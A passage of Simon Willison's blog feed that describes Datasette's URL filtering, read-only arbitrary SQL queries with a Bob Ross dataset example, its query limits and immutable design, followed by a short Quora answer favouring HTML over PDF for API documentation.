&lt;p&gt;Datasette supports a limited form of filtering based on URL parameters, inspired by Django’s ORM. Here’s an example: by appending &lt;code&gt;?CLOUDS=1&amp;amp;MOUNTAINS=1&amp;amp;BUSHES=1&lt;/code&gt; to the FiveThirtyEight dataset of episodes of &lt;a href="https://en.wikipedia.org/wiki/The_Joy_of_Painting"&gt;Bob Ross’ The Joy of Painting&lt;/a&gt; we can see every episode in which Bob paints clouds, bushes AND mountains:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://fivethirtyeight.datasettes.com/fivethirtyeight-2628db9/bob-ross%2Felements-by-episode?CLOUDS=1&amp;amp;MOUNTAINS=1&amp;amp;BUSHES=1"&gt;https://fivethirtyeight.datasettes.com/fivethirtyeight-2628db9/bob-ross%2Felements-by-episode?CLOUDS=1&amp;amp;MOUNTAINS=1&amp;amp;BUSHES=1&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;And here’s &lt;a href="https://fivethirtyeight.datasettes.com/fivethirtyeight-2628db9/bob-ross%2Felements-by-episode.jsono?CLOUDS=1&amp;amp;MOUNTAINS=1&amp;amp;BUSHES=1"&gt;the same episode list as JSON&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;&lt;a id="Arbitrary_SQL_55"&gt;&lt;/a&gt;Arbitrary SQL&lt;/h2&gt;
&lt;p&gt;The most exciting feature of datasette is that it allows users to execute &lt;em&gt;arbitrary SQL queries&lt;/em&gt; against the database. Here’s &lt;a href="https://fivethirtyeight.datasettes.com/fivethirtyeight?sql=select+%28select+sum%28%22APPLE_FRAME%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+APPLE_FRAME%2C%0D%0A%28select+sum%28%22AURORA_BOREALIS%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+AURORA_BOREALIS%2C%0D%0A%28select+sum%28%22BARN%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+BARN%2C%0D%0A%28select+sum%28%22BEACH%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+BEACH%2C%0D%0A%28select+sum%28%22BOAT%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+BOAT%2C%0D%0A%28select+sum%28%22BRIDGE%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+BRIDGE%2C%0D%0A%28select+sum%28%22BUILDING%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+BUILDING%2C%0D%0A%28select+sum%28%22BUSHES%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+BUSHES%2C%0D%0A%28select+sum%28%22CABIN%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+CABIN%2C%0D%0A%28select+sum%28%22CACTUS%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+CACTUS%2C%0D%0A%28select+sum%28%22CIRCLE_FRAME%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+CIRCLE_FRAME%2C%0D%0A%28select+sum%28%22CIRRUS%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+CIRRUS%2C%0D%0A%28select+sum%28%22CLIFF%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+CLIFF%2C%0D%0A%28select+sum%28%22CLOUDS%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+CLOUDS%2C%0D%0A%28select+sum%28%22CONIFER%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+CONIFER%2C%0D%0A%28select+sum%28%22CUMULUS%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+CUMULUS%2C%0D%0A%28select+sum%28%22DECIDUOUS%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+DECIDUOUS%2C%0D%0A%28select+sum%28%22DIANE_ANDRE%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+DIANE_ANDRE%2C%0D%0A%28select+sum%28%22DOCK%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+DOCK%2C%0D%0A%28select+sum%28%22DOUBLE_OVAL_FRAME%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+DOUBLE_OVAL_FRAME%2C%0D%0A%28select+sum%28%22FARM%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+FARM%2C%0D%0A%28select+sum%28%22FENCE%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+FENCE%2C%0D%0A%28select+sum%28%22FIRE%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+FIRE%2C%0D%0A%28select+sum%28%22FLORIDA_FRAME%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+FLORIDA_FRAME%2C%0D%0A%28select+sum%28%22FLOWERS%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+FLOWERS%2C%0D%0A%28select+sum%28%22FOG%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+FOG%2C%0D%0A%28select+sum%28%22FRAMED%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+FRAMED%2C%0D%0A%28select+sum%28%22GRASS%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+GRASS%2C%0D%0A%28select+sum%28%22GUEST%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+GUEST%2C%0D%0A%28select+sum%28%22HALF_CIRCLE_FRAME%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+HALF_CIRCLE_FRAME%2C%0D%0A%28select+sum%28%22HALF_OVAL_FRAME%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+HALF_OVAL_FRAME%2C%0D%0A%28select+sum%28%22HILLS%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+HILLS%2C%0D%0A%28select+sum%28%22LAKE%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+LAKE%2C%0D%0A%28select+sum%28%22LAKES%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+LAKES%2C%0D%0A%28select+sum%28%22LIGHTHOUSE%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+LIGHTHOUSE%2C%0D%0A%28select+sum%28%22MILL%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+MILL%2C%0D%0A%28select+sum%28%22MOON%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+MOON%2C%0D%0A%28select+sum%28%22MOUNTAIN%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+MOUNTAIN%2C%0D%0A%28select+sum%28%22MOUNTAINS%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+MOUNTAINS%2C%0D%0A%28select+sum%28%22NIGHT%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+NIGHT%2C%0D%0A%28select+sum%28%22OCEAN%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+OCEAN%2C%0D%0A%28select+sum%28%22OVAL_FRAME%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+OVAL_FRAME%2C%0D%0A%28select+sum%28%22PALM_TREES%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+PALM_TREES%2C%0D%0A%28select+sum%28%22PATH%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+PATH%2C%0D%0A%28select+sum%28%22PERSON%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+PERSON%2C%0D%0A%28select+sum%28%22PORTRAIT%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+PORTRAIT%2C%0D%0A%28select+sum%28%22RECTANGLE_3D_FRAME%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+RECTANGLE_3D_FRAME%2C%0D%0A%28select+sum%28%22RECTANGULAR_FRAME%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+RECTANGULAR_FRAME%2C%0D%0A%28select+sum%28%22RIVER%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+RIVER%2C%0D%0A%28select+sum%28%22ROCKS%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+ROCKS%2C%0D%0A%28select+sum%28%22SEASHELL_FRAME%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+SEASHELL_FRAME%2C%0D%0A%28select+sum%28%22SNOW%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+SNOW%2C%0D%0A%28select+sum%28%22SNOWY_MOUNTAIN%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+SNOWY_MOUNTAIN%2C%0D%0A%28select+sum%28%22SPLIT_FRAME%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+SPLIT_FRAME%2C%0D%0A%28select+sum%28%22STEVE_ROSS%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+STEVE_ROSS%2C%0D%0A%28select+sum%28%22STRUCTURE%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+STRUCTURE%2C%0D%0A%28select+sum%28%22SUN%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+SUN%2C%0D%0A%28select+sum%28%22TOMB_FRAME%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+TOMB_FRAME%2C%0D%0A%28select+sum%28%22TREE%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+TREE%2C%0D%0A%28select+sum%28%22TREES%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+TREES%2C%0D%0A%28select+sum%28%22TRIPLE_FRAME%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+TRIPLE_FRAME%2C%0D%0A%28select+sum%28%22WATERFALL%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+WATERFALL%2C%0D%0A%28select+sum%28%22WAVES%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+WAVES%2C%0D%0A%28select+sum%28%22WINDMILL%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+WINDMILL%2C%0D%0A%28select+sum%28%22WINDOW_FRAME%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+WINDOW_FRAME%2C%0D%0A%28select+sum%28%22WINTER%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+WINTER%2C%0D%0A%28select+sum%28%22WOOD_FRAMED%22%29+from+%5Bbob-ross%2Felements-by-episode%5D%29+as+WOOD_FRAMED%3B"&gt;a convoluted Bob Ross example&lt;/a&gt;, returning a count for each of the items that can appear in a painting.&lt;/p&gt;
&lt;p&gt;Datasette has a number of limitations in place here: it cuts off any SQL queries that take longer than a threshold (defaulting to 1000ms) and it refuses to return more than 1,000 rows at a time - partly to avoid too much JSON serialization overhead.&lt;/p&gt;
&lt;p&gt;Datasette also blocks queries containing the string &lt;code&gt;PRAGMA&lt;/code&gt;, since these statements &lt;a href="https://sqlite.org/pragma.html"&gt;could be used to modify database settings at runtime&lt;/a&gt;. If you need to include &lt;code&gt;PRAGMA&lt;/code&gt; in an argument to a query you can do so by constructing a prepared statement:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select * from [twitter-ratio/senators] where &amp;quot;text&amp;quot; like :q
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;You can then construct a URL that incorporates both the SQL and provides a value for that named argument, like this: &lt;a href="https://fivethirtyeight.datasettes.com/fivethirtyeight-2628db9?sql=select+rowid%2C+*+from+%5Btwitter-ratio%2Fsenators%5D+where+%22text%22+like+%3Aq&amp;amp;q=%25pragmatic%25"&gt;https://fivethirtyeight.datasettes.com/fivethirtyeight-2628db9?sql=select+rowid%2C+*+from+[twitter-ratio%2Fsenators]+where+“text”+like+%3Aq&amp;amp;q=%25pragmatic%25&lt;/a&gt; - which returns tweets by US senators that include the word “pragmatic”.&lt;/p&gt;
&lt;h2&gt;&lt;a id="Why_an_immutable_API_67"&gt;&lt;/a&gt;Why an immutable API?&lt;/h2&gt;
&lt;p&gt;A key feature of datasette is that the API it provides is very deliberately read-only. This provides a number of interesting benefits:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;It lets us use SQLite in production in high traffic scenarios. SQLite is an incredible piece of technology, but it is rarely used in web application contexts due to its limitations with respect to concurrent writes. Datasette opens SQLite files &lt;a href="https://sqlite.org/c3ref/open.html"&gt;using the immutable option&lt;/a&gt;, eliminating any concurrency concerns and allowing SQLite to go even faster for reads.&lt;/li&gt;
&lt;li&gt;Since the database is read-only, we can accept arbitrary SQL queries from our users!&lt;/li&gt;
&lt;li&gt;The datasette API bakes the first few characters of the sha256 hash of the database file contents into the API URLs themselves - for example in &lt;a href="https://parlgov.datasettes.com/parlgov-25f9855/cabinet"&gt;https://parlgov.datasettes.com/parlgov-25f9855/cabinet&lt;/a&gt;. This lets us serve year-long HTTP cache expiry headers, safe in the knowledge that any changes to the data will result in a change to the URL. These cache headers cause the content to be cached by both browsers and intermediary caches, such as Cloudflare.&lt;/li&gt;
&lt;li&gt;Read-only data makes datasette an ideal candidate for containerization. Deployments to Zeit Now happen using a Docker container, and the &lt;code&gt;datasette package&lt;/code&gt; command can be used to build a Docker image that bundles the database files and the datasette application together. If you need to scale to handle vast amounts of traffic, just deploy a bunch of extra containers and load-balance between them.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;a id="Implementation_notes_76"&gt;&lt;/a&gt;Implementation notes&lt;/h2&gt;
&lt;p&gt;Datasette is built on top of the &lt;a href="https://github.com/channelcat/sanic"&gt;Sanic&lt;/a&gt; asynchronous Python web framework (see &lt;a href="https://simonwillison.net/2017/Oct/14/async-python-sanic-now/"&gt;my previous notes&lt;/a&gt;), and makes extensive use of Python 3’s async/await statements. Since SQLite doesn’t yet have an async Python module all interactions with SQLite are handled inside a thread pool managed by a &lt;a href="https://docs.python.org/3/library/concurrent.futures.html#threadpoolexecutor"&gt;concurrent.futures.ThreadPoolExecutor&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The CLI is implemented using the &lt;a href="http://click.pocoo.org/"&gt;Click framework&lt;/a&gt;. This is the first time I’ve used Click and it was an absolute joy to work with. I enjoyed it so much I turned one of my Jupyter notebooks into a Click script called &lt;a href="https://github.com/simonw/csvs-to-sqlite"&gt;csvs-to-sqlite&lt;/a&gt; and published it to PyPI.&lt;/p&gt;

&lt;p&gt;This post is &lt;a href="https://news.ycombinator.com/item?id=15691409"&gt;being discussed on a Hacker News&lt;/a&gt;.&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/apis"&gt;apis&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/cli"&gt;cli&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/json"&gt;json&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/webapis"&gt;webapis&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sanic"&gt;sanic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/docker"&gt;docker&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="apis"/><category term="cli"/><category term="json"/><category term="projects"/><category term="sqlite"/><category term="webapis"/><category term="sanic"/><category term="docker"/><category term="datasette"/></entry><entry><title>Which format for API documentation programmers prefer: PDF or Web?</title><link href="https://simonwillison.net/2013/Dec/3/which-format-for-api/#atom-tag" rel="alternate"/><published>2013-12-03T09:12:00+00:00</published><updated>2013-12-03T09:12:00+00:00</updated><id>https://simonwillison.net/2013/Dec/3/which-format-for-api/#atom-tag</id><summary type="html">
    &lt;p&gt;&lt;em&gt;My answer to &lt;a href="https://www.quora.com/Which-format-for-API-documentation-programmers-prefer-PDF-or-Web/answer/Simon-Willison"&gt;Which format for API documentation programmers prefer: PDF or Web?&lt;/a&gt; on Quora&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;HTML is a better format for documentation than PDF.&lt;/p&gt;

&lt;p&gt;Documentation needs to be easy to access, easy to bookmark, easy to share links to and easy to copy and paste from. &lt;/p&gt;

&lt;p&gt;PDFs are lousy for linking to (you can link to the whole document but not to individual sections) and frequently cause weird issues when copy and pasting.&lt;/p&gt;

&lt;p&gt;The two advantages of PDF are that you (the author) get more control over how it prints and it's easier for the end user to download as a single file for offline reading.&lt;/p&gt;

&lt;p&gt;If you think these issues are important to your audience you can solve them with HTML by including a good print stylesheet and a zip file for download of all HTML and assets. You could also use a documentation system such as &lt;span&gt;&lt;a href="http://sphinx-doc.org/"&gt;http://sphinx-doc.org/&lt;/a&gt;&lt;/span&gt; which can generate both HTML and PDF versions.&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/apis"&gt;apis&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/programming"&gt;programming&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/quora"&gt;quora&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="apis"/><category term="programming"/><category term="quora"/></entry></feed>